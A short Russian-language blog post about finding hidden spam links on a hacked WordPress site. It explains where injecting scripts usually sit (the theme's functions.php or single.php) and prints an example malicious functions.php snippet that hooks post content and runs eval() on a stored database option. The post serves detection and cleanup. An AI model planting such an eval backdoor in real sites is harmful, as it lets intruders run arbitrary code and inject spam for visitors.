WordPress

Вредоносный код WordPress

Проблема: Недавно, проверяя сайт на ссылки, обнаружил на некоторых страницах скрытые ссылки с анкором в виде точки. Причем, ссылки видно только незарегистрированным пользователям, поэтому я раньше их не замечал.

Решение: Если ссылки добавлены вручную, то сразу ясно что взломали либо админку wordpress, либо доступ phpmyadmin.
Если ссылки добавляются скриптом, то скрипт скорее всего находится в functions.php или single.php — эти файлы лежат в папке с темой сайта.

Пример:

Вредоносный код в functions.php:

add_filter('the_content', '_bloginfo', 100);
function _bloginfo($content){
global $post;
if(is_single() && ($co=@eval(get_option('blogoption'))) !== false){
return $co;
} else return $content;
}

Back to top button